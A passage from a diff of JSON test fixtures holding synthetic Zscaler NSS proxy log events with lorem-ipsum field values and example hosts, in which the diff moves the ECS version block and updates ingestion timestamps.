- "version": "1.12.0" - }, "message": "ritati ZSCALERNSS: time=orisni Jan 6 7:11:41 
2017^^timezone=PST^^action=Blocked^^reason=failure^^hostname=sitam5077.internal.host^^protocol=igmp^^serverip=10.179.210.218^^url=https://www.example.org/tanimi/rumSecti.jpg?emporain=ntiumto#umetMalo^^urlcategory=oluptas^^urlclass=emvele^^dlpdictionaries=isnost^^dlpengine=olorem^^filetype=ido^^threatcategory=emqu^^threatclass=riss^^pagerisk=iquamqua^^threatname=sit^^clientpublicIP=rumSect^^ClientIP=10.32.39.220^^location=aliq^^refererURL=https://example.net/mven/olorsit.gif?oremag=illu#ruredo^^useragent=Mozilla/5.0 (Linux; Android 10; SM-A715F Build/QP1A.190711.020; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/83.0.4103.83 Mobile Safari/537.36 [FB_IAB/Orca-Android;FBAV/266.0.0.16.117;]^^department=tatevel^^user=boreetdo^^event_id=undeom^^clienttranstime=uamnihi^^requestmethod=risnis^^requestsize=1140^^requestversion=scingeli^^status=isn^^responsesize=4814^^responseversion=omm^^transactionsize=696", "event": { - "ingested": "2021-06-14T08:26:19.844928100Z" + "ingested": "2021-12-14T14:59:54.590727346Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "quunt ZSCALERNSS: time=numquam Jan 20 2:14:16 2017^^timezone=CT^^action=Blocked^^reason=failure^^hostname=dquia107.www.test^^protocol=ipv6^^serverip=10.128.173.19^^url=https://api.example.com/ori/tconsect.html?ercit=eporroq#ulla^^urlcategory=iqu^^urlclass=oin^^dlpdictionaries=hil^^dlpengine=cingel^^filetype=modocon^^threatcategory=ipsu^^threatclass=ntNeq^^pagerisk=tate^^threatname=urExce^^clientpublicIP=asi^^ClientIP=10.88.172.34^^location=atv^^refererURL=https://example.org/liquaUte/alorum.txt?ria=atDu#nsec^^useragent=Mozilla/5.0 (Linux; Android 4.1.2; Micromax P410i Build/JZO54K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.111 Mobile 
Safari/537.36^^department=maperi^^user=agnaaliq^^event_id=tlaboree^^clienttranstime=norumet^^requestmethod=dtempo^^requestsize=7680^^requestversion=col^^status=mve^^responsesize=3916^^responseversion=tinvolup^^transactionsize=2365", "event": { - "ingested": "2021-06-14T08:26:19.844934200Z" + "ingested": "2021-12-14T14:59:54.590727732Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "inv ZSCALERNSS: time=rroq Feb 3 9:16:50 2017^^timezone=CT^^action=Allowed^^reason=unknown^^hostname=lloin4019.www.localhost^^protocol=igmp^^serverip=10.130.241.232^^url=https://api.example.org/rure/asiarchi.txt?loremeu=aturve#utfug^^urlcategory=aturQu^^urlclass=aaliq^^dlpdictionaries=mipsamvo^^dlpengine=eiusmod^^filetype=emoe^^threatcategory=uiinea^^threatclass=mnisiut^^pagerisk=avolu^^threatname=Except^^clientpublicIP=olup^^ClientIP=10.238.224.49^^location=asper^^refererURL=https://example.net/naal/equun.gif?mve=uia#iciad^^useragent=Mozilla/5.0 (Linux; Android 9; POCOPHONE F1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.83 Mobile Safari/537.36^^department=mad^^user=onse^^event_id=redol^^clienttranstime=gnaa^^requestmethod=mod^^requestsize=5107^^requestversion=dtempori^^status=toditaut^^responsesize=7889^^responseversion=dexerc^^transactionsize=2302", "event": { - "ingested": "2021-06-14T08:26:19.844939200Z" + "ingested": "2021-12-14T14:59:54.590728261Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "eprehend ZSCALERNSS: time=asnu Feb 18 4:19:24 
2017^^timezone=OMST^^action=Allowed^^reason=unknown^^hostname=tamet6317.www.host^^protocol=igmp^^serverip=10.115.53.31^^url=https://example.com/emUte/molestia.htm?orroqu=elitsed#labore^^urlcategory=uela^^urlclass=ntexplic^^dlpdictionaries=uto^^dlpengine=iuntNequ^^filetype=esseq^^threatcategory=aincidun^^threatclass=quatD^^pagerisk=isqua^^threatname=uta^^clientpublicIP=emo^^ClientIP=10.2.67.127^^location=licaboN^^refererURL=https://mail.example.org/cupi/strude.htm?dunt=litsedq#nderiti^^useragent=Mozilla/5.0 (Linux; Android 9; U307AS) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.83 Mobile Safari/537.36^^department=mdolore^^user=Cic^^event_id=olorema^^clienttranstime=mollita^^requestmethod=tatem^^requestsize=6156^^requestversion=aeab^^status=teur^^responsesize=609^^responseversion=inBC^^transactionsize=2622", "event": { - "ingested": "2021-06-14T08:26:19.844944300Z" + "ingested": "2021-12-14T14:59:54.590728650Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "tur ZSCALERNSS: time=ictas Mar 4 11:21:59 2017^^timezone=OMST^^action=Allowed^^reason=unknown^^hostname=saquaea6344.www.invalid^^protocol=igmp^^serverip=10.204.214.251^^url=https://mail.example.net/repreh/plic.jpg?utlabo=tetur#tionula^^urlcategory=ritqu^^urlclass=ecatcupi^^dlpdictionaries=uamei^^dlpengine=undeomni^^filetype=tas^^threatcategory=autfugi^^threatclass=tasun^^pagerisk=duntutla^^threatname=ntium^^clientpublicIP=iration^^ClientIP=10.101.38.213^^location=orisni^^refererURL=https://example.org/modoc/boNem.gif?ssusci=animid#mpo^^useragent=Mozilla/5.0 (Linux; Android 9; U307AS) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.83 Mobile Safari/537.36^^department=atuse^^user=ueipsa^^event_id=scipitl^^clienttranstime=eumi^^requestmethod=quasiarc^^requestsize=3487^^requestversion=leumiur^^status=tetura^^responsesize=5328^^responseversion=offici^^transactionsize=501", "event": { - "ingested": 
"2021-06-14T08:26:19.844950Z" + "ingested": "2021-12-14T14:59:54.590729052Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "roquisqu ZSCALERNSS: time=edolorin Mar 18 6:24:33 2017^^timezone=GMT+02:00^^action=Allowed^^reason=failure^^hostname=utaliqu4248.www.localhost^^protocol=igmp^^serverip=10.18.226.72^^url=https://api.example.com/tcu/iatqu.jpg?quovo=urExcep#ema^^urlcategory=suntex^^urlclass=iacons^^dlpdictionaries=occaec^^dlpengine=acommodi^^filetype=essecill^^threatcategory=billoi^^threatclass=moles^^pagerisk=dipiscin^^threatname=olup^^clientpublicIP=aco^^ClientIP=10.101.85.169^^location=natu^^refererURL=https://internal.example.net/enim/Finibus.htm?mporainc=xea#taed^^useragent=Mozilla/5.0 (Linux; Android 9; G8142) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.83 Mobile Safari/537.36^^department=billo^^user=rroqu^^event_id=dquiaco^^clienttranstime=nibus^^requestmethod=vitaed^^requestsize=2352^^requestversion=ptasnula^^status=oru^^responsesize=2118^^responseversion=upt^^transactionsize=7879", "event": { - "ingested": "2021-06-14T08:26:19.844955100Z" + "ingested": "2021-12-14T14:59:54.590729439Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "eprehend ZSCALERNSS: time=rem Apr 2 1:27:07 2017^^timezone=GMT-07:00^^action=Allowed^^reason=unknown^^hostname=mdolore473.internal.test^^protocol=igmp^^serverip=10.87.100.240^^url=https://www5.example.com/apariatu/lorsita.gif?msequ=uat#lupta^^urlcategory=npr^^urlclass=etconsec^^dlpdictionaries=caboNem^^dlpengine=urExcept^^filetype=rumetMal^^threatcategory=oconse^^threatclass=mag^^pagerisk=tob^^threatname=dolores^^clientpublicIP=equamnih^^ClientIP=10.242.182.193^^location=itempo^^refererURL=https://mail.example.com/redol/ecillum.html?radipis=ctetu#orinrep^^useragent=Mozilla/5.0 (Linux; Android 8.0.0; VS996) AppleWebKit/537.36 (KHTML, like Gecko) 
Chrome/83.0.4103.83 Mobile Safari/537.36^^department=nder^^user=stenatus^^event_id=equep^^clienttranstime=ever^^requestmethod=tali^^requestsize=2124^^requestversion=erspi^^status=iqu^^responsesize=7509^^responseversion=incidid^^transactionsize=2617", "event": { - "ingested": "2021-06-14T08:26:19.844959900Z" + "ingested": "2021-12-14T14:59:54.590729819Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "autemv ZSCALERNSS: time=emq Apr 16 8:29:41 2017^^timezone=GMT-07:00^^action=Blocked^^reason=failure^^hostname=tatio6513.www.invalid^^protocol=rdp^^serverip=10.229.242.223^^url=https://internal.example.net/ende/abor.jpg?riameaqu=ame#tesseq^^urlcategory=niam^^urlclass=pernat^^dlpdictionaries=rerepre^^dlpengine=nculpaq^^filetype=culpaqui^^threatcategory=tvolup^^threatclass=tdolore^^pagerisk=ventore^^threatname=red^^clientpublicIP=sinto^^ClientIP=10.80.57.247^^location=est^^refererURL=https://api.example.net/aev/inrepr.gif?iadese=nisiu#imad^^useragent=Mozilla/5.0 (Linux; Android 9; ZTE Blade V1000RU Build/PPR1.180610.011) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.138 Mobile Safari/537.36 YaApp_Android/10.91 YaSearchBrowser/10.91^^department=ptatem^^user=itasp^^event_id=dexe^^clienttranstime=tat^^requestmethod=onproide^^requestsize=2737^^requestversion=cillumd^^status=riosa^^responsesize=204^^responseversion=aspernat^^transactionsize=2460", "event": { - "ingested": "2021-06-14T08:26:19.844965Z" + "ingested": "2021-12-14T14:59:54.590730284Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "caecat ZSCALERNSS: time=rautod Apr 30 3:32:16 
2017^^timezone=PT^^action=Allowed^^reason=failure^^hostname=lapar1599.www.lan^^protocol=ipv6^^serverip=10.193.66.155^^url=https://example.com/ame/amvolu.txt?equaturv=lamc#mvolupta^^urlcategory=Utenima^^urlclass=iqua^^dlpdictionaries=luptat^^dlpengine=deriti^^filetype=sintocc^^threatcategory=cididu^^threatclass=uteir^^pagerisk=boree^^threatname=isn^^clientpublicIP=ulla^^ClientIP=10.106.77.138^^location=aconse^^refererURL=https://mail.example.net/tnonproi/squira.html?itation=veleum#piciatis^^useragent=Mozilla/5.0 (Linux; Android 6.0; Lenovo A2016a40 Build/MRA58K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.106 Mobile Safari/537.36 YaApp_Android/10.30 YaSearchBrowser/10.30^^department=henderi^^user=iusmodt^^event_id=enim^^clienttranstime=emaperia^^requestmethod=Section^^requestsize=4329^^requestversion=iame^^status=orroquis^^responsesize=6146^^responseversion=tiumd^^transactionsize=6099", "event": { - "ingested": "2021-06-14T08:26:19.844969600Z" + "ingested": "2021-12-14T14:59:54.590730675Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "mexer ZSCALERNSS: time=estla May 14 10:34:50 2017^^timezone=ET^^action=Allowed^^reason=success^^hostname=aquioff3853.www.localdomain^^protocol=udp^^serverip=10.236.230.136^^url=https://mail.example.org/uisnostr/reetdol.txt?ugi=niamquis#nisi^^urlcategory=emveleum^^urlclass=olup^^dlpdictionaries=nde^^dlpengine=abillo^^filetype=undeom^^threatcategory=emullamc^^threatclass=tec^^pagerisk=Nemo^^threatname=tutlabo^^clientpublicIP=mveleum^^ClientIP=10.54.159.1^^location=sBonorum^^refererURL=https://mail.example.net/quira/tassita.gif?oremi=ugitsedq#turmag^^useragent=Mozilla/5.0 (Linux; Android 10; STK-L21 Build/HUAWEISTK-L21) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.83 Mobile Safari/537.36 YaApp_Android/10.91 
YaSearchBrowser/10.91^^department=asnulapa^^user=mUteni^^event_id=quira^^clienttranstime=rror^^requestmethod=tatema^^requestsize=2446^^requestversion=loinve^^status=tatevel^^responsesize=3862^^responseversion=equu^^transactionsize=5373", "event": { - "ingested": "2021-06-14T08:26:19.844974200Z" + "ingested": "2021-12-14T14:59:54.590731066Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "atae ZSCALERNSS: time=tetura May 29 5:37:24 2017^^timezone=OMST^^action=Allowed^^reason=success^^hostname=ura675.mail.localdomain^^protocol=ggp^^serverip=10.49.242.174^^url=https://api.example.com/radipis/cive.gif?orumSec=nisiuta#stiaecon^^urlcategory=dol^^urlclass=sumquiad^^dlpdictionaries=setquas^^dlpengine=minim^^filetype=oeni^^threatcategory=untutlab^^threatclass=tvolup^^pagerisk=consecte^^threatname=pteurs^^clientpublicIP=catcupi^^ClientIP=10.131.246.134^^location=tiaecon^^refererURL=https://api.example.com/amquisno/uido.gif?queporro=uid#snostrum^^useragent=Mozilla/5.0 (Linux; Android 6.0; Lenovo A2016a40 Build/MRA58K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.106 Mobile Safari/537.36 YaApp_Android/10.30 YaSearchBrowser/10.30^^department=aconsequ^^user=umdolo^^event_id=rroqui^^clienttranstime=ursin^^requestmethod=utemvel^^requestsize=5325^^requestversion=atu^^status=iusm^^responsesize=4968^^responseversion=laudanti^^transactionsize=16", "event": { - "ingested": "2021-06-14T08:26:19.844981200Z" + "ingested": "2021-12-14T14:59:54.590731590Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "rere ZSCALERNSS: time=cta Jun 12 12:39:58 
2017^^timezone=CT^^action=Blocked^^reason=unknown^^hostname=iamea478.www5.host^^protocol=ipv6-icmp^^serverip=10.142.120.198^^url=https://mail.example.org/oin/itseddoe.html?citati=uamei#eursinto^^urlcategory=litesse^^urlclass=fugiatn^^dlpdictionaries=uaeabi^^dlpengine=aaliq^^filetype=nat^^threatcategory=uovolupt^^threatclass=ende^^pagerisk=orumSe^^threatname=dolor^^clientpublicIP=isiut^^ClientIP=10.166.10.42^^location=emulla^^refererURL=https://www.example.com/itae/dtempo.html?etMaloru=lmo#iquidex^^useragent=Mozilla/5.0 (Linux; Android 9; LG-US998) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.83 Mobile Safari/537.36^^department=uamqu^^user=olori^^event_id=ido^^clienttranstime=mcorpor^^requestmethod=doconse^^requestsize=2522^^requestversion=emUte^^status=iusmodi^^responsesize=1046^^responseversion=tura^^transactionsize=6695", "event": { - "ingested": "2021-06-14T08:26:19.844986Z" + "ingested": "2021-12-14T14:59:54.590732116Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "equat ZSCALERNSS: time=aliquid Jun 26 7:42:33 2017^^timezone=GMT+02:00^^action=Allowed^^reason=unknown^^hostname=eaque6543.api.domain^^protocol=udp^^serverip=10.138.188.201^^url=https://mail.example.com/eseruntm/lpaquiof.html?magnaal=uscip#umS^^urlcategory=iciadese^^urlclass=riatur^^dlpdictionaries=oeni^^dlpengine=dol^^filetype=dol^^threatcategory=atur^^threatclass=issu^^pagerisk=identsu^^threatname=piscivel^^clientpublicIP=hend^^ClientIP=10.128.184.241^^location=aer^^refererURL=https://api.example.net/umd/sciveli.htm?tur=acon#Nemoenim^^useragent=Mozilla/5.0 (Linux; Android 6.0; ZTE BLADE V7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.83 Mobile Safari/537.36^^department=urau^^user=etur^^event_id=rsitvol^^clienttranstime=utali^^requestmethod=sed^^requestsize=6793^^requestversion=sec^^status=uid^^responsesize=3520^^responseversion=acom^^transactionsize=1142", "event": { - "ingested": 
"2021-06-14T08:26:19.844990800Z" + "ingested": "2021-12-14T14:59:54.590733039Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "ectob ZSCALERNSS: time=mrema Jul 11 2:45:07 2017^^timezone=CET^^action=Allowed^^reason=failure^^hostname=eufug1756.mail.corp^^protocol=ggp^^serverip=10.53.101.131^^url=https://example.net/snulap/enimadm.html?writte=sitvo#ine^^urlcategory=urerepre^^urlclass=asnulap^^dlpdictionaries=ipi^^dlpengine=idolorem^^filetype=exerci^^threatcategory=idata^^threatclass=ese^^pagerisk=mmodoco^^threatname=amni^^clientpublicIP=atnul^^ClientIP=10.213.57.165^^location=illumq^^refererURL=https://www5.example.org/ite/tasnul.txt?evitae=amvo#tnul^^useragent=Mozilla/5.0 (Linux; Android 9; LG-US998) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.83 Mobile Safari/537.36^^department=ectetura^^user=isau^^event_id=itinvol^^clienttranstime=ten^^requestmethod=litanim^^requestsize=2135^^requestversion=orsitam^^status=modico^^responsesize=2990^^responseversion=itatio^^transactionsize=6735", "event": { - "ingested": "2021-06-14T08:26:19.844995300Z" + "ingested": "2021-12-14T14:59:54.590733449Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "riame ZSCALERNSS: time=riat Jul 25 9:47:41 2017^^timezone=GMT+02:00^^action=Blocked^^reason=unknown^^hostname=orp5697.www.invalid^^protocol=ggp^^serverip=10.243.6.41^^url=https://internal.example.org/etcon/onsequu.gif?Bonoru=madminim#ents^^urlcategory=emacc^^urlclass=emp^^dlpdictionaries=lamcola^^dlpengine=veli^^filetype=venia^^threatcategory=risni^^threatclass=idolores^^pagerisk=paria^^threatname=mmod^^clientpublicIP=iti^^ClientIP=10.55.81.14^^location=lorsitam^^refererURL=https://api.example.org/onpr/litseddo.gif?oremqu=idex#radip^^useragent=Mozilla/5.0 (Linux; Android 9; Pixel 3 Build/PD1A.180720.030) AppleWebKit/537.36 (KHTML, like Gecko) 
Chrome/66.0.3359.158 Mobile Safari/537.36^^department=tenim^^user=eiusmo^^event_id=ainc^^clienttranstime=miurerep^^requestmethod=lestia^^requestsize=3606^^requestversion=iduntu^^status=pisci^^responsesize=3601^^responseversion=nostrud^^transactionsize=203", "event": { - "ingested": "2021-06-14T08:26:19.844999900Z" + "ingested": "2021-12-14T14:59:54.590733842Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "ore ZSCALERNSS: time=esse Aug 8 4:50:15 2017^^timezone=PST^^action=Blocked^^reason=success^^hostname=pariatur7238.www5.invalid^^protocol=tcp^^serverip=10.33.144.10^^url=https://www.example.org/rur/itse.gif?pisciv=fugiatqu#seos^^urlcategory=exercita^^urlclass=edolori^^dlpdictionaries=eve^^dlpengine=tco^^filetype=tvol^^threatcategory=oluptate^^threatclass=lit^^pagerisk=santi^^threatname=ritati^^clientpublicIP=iciade^^ClientIP=10.202.224.79^^location=idolo^^refererURL=https://example.com/ptassita/caecatcu.txt?eturadip=olorsi#itseddo^^useragent=Mozilla/5.0 (Linux; Android 9; LG-US998) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.83 Mobile Safari/537.36^^department=seos^^user=rios^^event_id=labo^^clienttranstime=lpaquiof^^requestmethod=quu^^requestsize=2203^^requestversion=ntexpl^^status=abor^^responsesize=4241^^responseversion=enbyCi^^transactionsize=3813", "event": { - "ingested": "2021-06-14T08:26:19.845004800Z" + "ingested": "2021-12-14T14:59:54.590734243Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "tat ZSCALERNSS: time=eufugia Aug 22 11:52:50 
2017^^timezone=GMT-07:00^^action=Allowed^^reason=failure^^hostname=fficia2304.www5.home^^protocol=icmp^^serverip=10.158.18.51^^url=https://mail.example.com/qui/equeporr.jpg?itsedd=texpli#liquipex^^urlcategory=uisnos^^urlclass=quamqua^^dlpdictionaries=ntut^^dlpengine=mag^^filetype=meum^^threatcategory=mini^^threatclass=Loremip^^pagerisk=oreeu^^threatname=nvo^^clientpublicIP=iamqui^^ClientIP=10.20.124.138^^location=aqui^^refererURL=https://www.example.net/lpa/isn.htm?iat=ffic#siuta^^useragent=Mozilla/5.0 (Linux; Android 9; U307AS) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.83 Mobile Safari/537.36^^department=aparia^^user=CSe^^event_id=exerci^^clienttranstime=inesciu^^requestmethod=quid^^requestsize=5452^^requestversion=emu^^status=orem^^responsesize=6317^^responseversion=ate^^transactionsize=4386", "event": { - "ingested": "2021-06-14T08:26:19.845009200Z" + "ingested": "2021-12-14T14:59:54.590734711Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "tqu ZSCALERNSS: time=eirur Sep 6 6:55:24 2017^^timezone=CT^^action=Allowed^^reason=unknown^^hostname=mquisnos7453.home^^protocol=igmp^^serverip=10.134.128.27^^url=https://api.example.net/lup/iumtotam.html?ipitlabo=userror#eacommo^^urlcategory=nderi^^urlclass=liqua^^dlpdictionaries=ariatur^^dlpengine=labo^^filetype=sautei^^threatcategory=ataevita^^threatclass=voluptas^^pagerisk=velill^^threatname=rspic^^clientpublicIP=orinrepr^^ClientIP=10.118.177.136^^location=borumSec^^refererURL=https://www5.example.org/snisiut/siar.txt?inB=orp#ender^^useragent=Mozilla/5.0 (Linux; Android 7.0; MEIZU M6 Build/NRD90M) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Mobile Safari/537.36 YaApp_Android/10.30 
YaSearchBrowser/10.30^^department=rumSecti^^user=Utenima^^event_id=olore^^clienttranstime=orumS^^requestmethod=olor^^requestsize=6908^^requestversion=eursint^^status=orio^^responsesize=1044^^responseversion=iameaqu^^transactionsize=2429", "event": { - "ingested": "2021-06-14T08:26:19.845013800Z" + "ingested": "2021-12-14T14:59:54.590735155Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "olu ZSCALERNSS: time=iameaque Sep 20 1:57:58 2017^^timezone=OMST^^action=Allowed^^reason=unknown^^hostname=aquio748.www.localhost^^protocol=igmp^^serverip=10.68.8.143^^url=https://example.org/onproide/uamnih.htm?tatisetq=uidolo#umdolore^^urlcategory=dmi^^urlclass=tam^^dlpdictionaries=oremip^^dlpengine=eufugi^^filetype=dunt^^threatcategory=ames^^threatclass=amni^^pagerisk=tatio^^threatname=amquisno^^clientpublicIP=modoc^^ClientIP=10.125.120.97^^location=uid^^refererURL=https://internal.example.com/onev/orsi.txt?oreseo=reprehen#itamet^^useragent=Mozilla/5.0 (Linux; Android 9; Pixel 3 Build/PD1A.180720.030) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.158 Mobile Safari/537.36^^department=idolo^^user=reet^^event_id=lorem^^clienttranstime=texplic^^requestmethod=edutp^^requestsize=911^^requestversion=assi^^status=eserun^^responsesize=3034^^responseversion=eniamqu^^transactionsize=1185", "event": { - "ingested": "2021-06-14T08:26:19.845018800Z" + "ingested": "2021-12-14T14:59:54.590735570Z" }, - "tags": [ + "ecs": { + "version": "1.12.0" + }, + "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "tatevel ZSCALERNSS: time=midestl Oct 4 9:00:32 
2017^^timezone=PST^^action=Blocked^^reason=unknown^^hostname=remagnam796.mail.corp^^protocol=rdp^^serverip=10.143.0.78^^url=https://www5.example.org/obeataev/umf.htm?moll=quaeabil#emip^^urlcategory=aturQu^^urlclass=itesse^^dlpdictionaries=iamqui^^dlpengine=quide^^filetype=aria^^threatcategory=inim^^threatclass=etdol^^pagerisk=Sed^^threatname=oremeumf^^clientpublicIP=lesti^^ClientIP=10.137.164.122^^location=enima^^refererURL=https://www5.example.net/ico/giatquo.htm?evi=tionula#accus^^useragent=Mozilla/5.0 (Linux; Android 7.0; MEIZU M6 Build/NRD90M) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Mobile Safari/537.36 YaApp_Android/10.30 YaSearchBrowser/10.30^^department=amnihil^^user=orissus^^event_id=atems^^clienttranstime=nimaveni^^requestmethod=mwrit^^requestsize=2923^^requestversion=itse^^status=officiad^^responsesize=4982^^responseversion=nimadmin^^transactionsize=5577", "event": { - "ingested": "2021-06-14T08:26:19.845023200Z" + "ingested": "2021-12-14T14:59:54.590735967Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "quiavolu ZSCALERNSS: time=upta Oct 19 4:03:07 2017^^timezone=OMST^^action=Blocked^^reason=failure^^hostname=etdolore4227.internal.corp^^protocol=icmp^^serverip=10.30.87.51^^url=https://mail.example.org/consequa/eaqueip.gif?aevitaed=byCic#leumiur^^urlcategory=ptatemse^^urlclass=siarc^^dlpdictionaries=fdeFin^^dlpengine=eleumi^^filetype=edic^^threatcategory=udexerc^^threatclass=tatno^^pagerisk=isnisiut^^threatname=atatnon^^clientpublicIP=lica^^ClientIP=10.156.177.53^^location=Nequ^^refererURL=https://www.example.com/epo/rsit.txt?onorumet=ptatema#eavolup^^useragent=Mozilla/5.0 (Linux; Android 10; ASUS_X01BDA) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.162 Mobile 
Safari/537.36^^department=rmagnido^^user=psaquaea^^event_id=rchit^^clienttranstime=psumq^^requestmethod=ptatev^^requestsize=6552^^requestversion=xerc^^status=ctetura^^responsesize=7556^^responseversion=tDuis^^transactionsize=3281", "event": { - "ingested": "2021-06-14T08:26:19.845027600Z" + "ingested": "2021-12-14T14:59:54.590736379Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "tat ZSCALERNSS: time=equ Nov 2 11:05:41 2017^^timezone=GMT+02:00^^action=Blocked^^reason=unknown^^hostname=rors1935.api.domain^^protocol=udp^^serverip=10.83.138.34^^url=https://example.org/tmo/onofdeF.txt?oremip=its#uptasnul^^urlcategory=aliqui^^urlclass=datatnon^^dlpdictionaries=aedict^^dlpengine=niamqui^^filetype=usmodite^^threatcategory=tlabo^^threatclass=tatemse^^pagerisk=ntoccaec^^threatname=uamestqu^^clientpublicIP=mpor^^ClientIP=10.111.249.184^^location=ptatemU^^refererURL=https://example.org/rumSe/tatnonp.jpg?tlabore=idunt#expl^^useragent=Mozilla/5.0 (iPhone; CPU iPhone OS 13_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Mobile/15E148 LightSpeed [FBAN/MessengerLiteForiOS;FBAV/266.0.0.32.114;FBBV/216059178;FBDV/iPhone10,6;FBMD/iPhone;FBSN/iOS;FBSV/13.4.1;FBSS/3;FBCR/;FBID/phone;FBLC/en_US;FBOP/0]^^department=onsectet^^user=dentsunt^^event_id=inea^^clienttranstime=animid^^requestmethod=upta^^requestsize=313^^requestversion=onnumqua^^status=quioff^^responsesize=470^^responseversion=upt^^transactionsize=6017", "event": { - "ingested": "2021-06-14T08:26:19.845032400Z" + "ingested": "2021-12-14T14:59:54.590736794Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "nvol ZSCALERNSS: time=dtemp Nov 16 6:08:15 
2017^^timezone=PT^^action=Allowed^^reason=unknown^^hostname=idexeac1655.internal.test^^protocol=ipv6^^serverip=10.141.195.13^^url=https://mail.example.com/orsitvol/ntor.htm?itqu=minimav#smodtem^^urlcategory=roquisqu^^urlclass=ariat^^dlpdictionaries=midestl^^dlpengine=quatu^^filetype=avolu^^threatcategory=teturad^^threatclass=itesse^^pagerisk=expl^^threatname=essecill^^clientpublicIP=totamre^^ClientIP=10.180.150.47^^location=orsitv^^refererURL=https://internal.example.net/uisaute/uun.jpg?olupt=nemulla#asp^^useragent=Mozilla/5.0 (Linux; Android 6.0; U20 Build/MRA58K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.147 Mobile Safari/537.36 YaApp_Android/10.90 YaSearchBrowser/10.90^^department=ncul^^user=taliq^^event_id=tautfugi^^clienttranstime=fdeFinib^^requestmethod=uip^^requestsize=3940^^requestversion=sectetur^^status=edquian^^responsesize=7810^^responseversion=turQuis^^transactionsize=4046", "event": { - "ingested": "2021-06-14T08:26:19.845037100Z" + "ingested": "2021-12-14T14:59:54.590737228Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "uames ZSCALERNSS: time=tconsec Dec 1 1:10:49 2017^^timezone=GMT-07:00^^action=Allowed^^reason=failure^^hostname=laboree3880.api.invalid^^protocol=rdp^^serverip=10.166.195.20^^url=https://internal.example.org/rumexe/xerci.gif?olor=quiav#gna^^urlcategory=Nem^^urlclass=tdolorem^^dlpdictionaries=eacomm^^dlpengine=upidata^^filetype=ici^^threatcategory=usant^^threatclass=mipsumq^^pagerisk=ident^^threatname=nimide^^clientpublicIP=quelaud^^ClientIP=10.255.40.12^^location=rro^^refererURL=https://api.example.com/nimv/emeu.htm?rem=tseddoei#teursint^^useragent=Opera/9.80 (Series 60; Opera Mini/7.1.32444/174.101; U; ru) Presto/2.12.423 
